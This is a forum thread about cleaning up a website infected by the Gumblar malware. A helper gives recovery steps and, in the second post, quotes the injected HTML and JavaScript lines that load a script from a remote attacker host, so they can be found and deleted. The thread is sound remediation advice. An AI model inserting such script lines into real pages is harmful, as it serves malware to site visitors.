Go Back   Tech Support Forum > Design Forum > Design Discussion & FAQs

User Tag List

[SOLVED] Blocking automatic Javascripts [.js] from hijacking my website

This is a discussion on [SOLVED] Blocking automatic Javascripts [.js] from hijacking my website within the Design Discussion & FAQs forums, part of the Tech Support Forum category. Hi Team, I have fallen victim to the Gumblar Malware. https://www.whitefirdesign.com/resources/gumblar-malware.html This malware began planting script codes into my webpages


Closed Thread
 
Thread Tools Search this Thread
Old 03-26-2010, 03:42 PM   #1
Registered Member
 
Join Date: Sep 2008
Posts: 25
OS: Windows XP



Hi Team,

I have fallen victim to the Gumblar Malware. https://www.whitefirdesign.com/resources/gumblar-malware.html

This malware began planting script codes into my webpages without giving a hint of where they are located. Basically anyone visiting my page will result in a .js file that can give your computer a virus. My question is; is there a way to detect where the code is currently running from my PHP pages? I know PHP can call codes from other PHP pages, but as you View Source of the webpage, it doesn't really tell you where the scripts are being pulled from. Of course my first intentions were to detect the cause rather than figuring out a solution first.

My second plan would be to run a script that would automatically ban, blacklist, or stop the automatic script from running. Any ideas?

Thanks,
Johnny
Spectating is offline  
Sponsored Links
Advertisement
 
Old 03-26-2010, 09:15 PM   #2
TSF Team, Emeritus
 
dm01's Avatar
 
Join Date: Oct 2006
Location: Richmond, B.C.; Canada
Posts: 2,356
OS: Windows 7 Ultimate

My System


The absolute first thing that you need to do is get checked out by the Security Team Malware Analysts: https://www.techsupportforum.com/f50/...lp-305963.html . Please read and follow all directions. There is no point in applying the required fixes on your server if the source machine is still infected.

Now, what you need to do is this:

As soon as you are disinfected, change your FTP password. This is the only way to absolutely stop the malware from re-infecting your site or computer. Why don't we do this first? Gumblar might be bundled with a keylogger, which would be able to grab the new FTP password and pass the information on to Gumblar.

Now, open your FTP connection with your new password, and either (a) edit the files "live" if you can, or (b) download the .htm, .html, and .js files. Search for the following:

HTML (.html and .htm files): <script src=https://onlyplaygame.com/services/comments.php ></script>

JavaScript (.js files) : document.write('<script src=https://onlyplaygame.com/services/comments.php ><\/script>');

Delete these lines.

Can you post a link to the infected site? I might be able to do a little bit more if I can see the pages themselves.
dm01 is offline  
Old 03-27-2010, 09:58 PM   #3
Registered Member
 
Join Date: Sep 2008
Posts: 25
OS: Windows XP



Hi Dm01,

Thank you for the suggestion. I became impatient and decided to start my website new again. It wasn't hard to re-transfer all my files and replacing some freshly new.

Please close thread if you can.

Thanks,
Johnny
Spectating is offline  
Sponsored Links
Advertisement
 
Old 03-27-2010, 10:41 PM   #4
TSF Team, Emeritus
 
dm01's Avatar
 
Join Date: Oct 2006
Location: Richmond, B.C.; Canada
Posts: 2,356
OS: Windows 7 Ultimate

My System


Just as long as you've checked them for the above scripts and changed your FTP password, I think you'll be fine. Good luck staying malware-free.
dm01 is offline  
Closed Thread

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is on
Smilies are on
[IMG] code is on
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off


Post a Question


» Site Navigation
 > FAQ
  > 10.0.0.2
Powered by vBadvanced CMPS v3.2.3


All times are GMT -7. The time now is 12:48 PM.


Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2020, vBulletin Solutions, Inc.
vBulletin Security provided by vBSecurity v2.2.2 (Pro) - vBulletin Mods & Addons Copyright © 2020 DragonByte Technologies Ltd.
User Alert System provided by Advanced User Tagging v3.1.0 (Pro) - vBulletin Mods & Addons Copyright © 2020 DragonByte Technologies Ltd.
Copyright 2001 - 2018, Tech Support Forum

Windows 10 - Windows 7 - Windows XP - Windows Vista - Trojan Removal - Spyware Removal - Virus Removal - Networking - Security - Top Web Hosts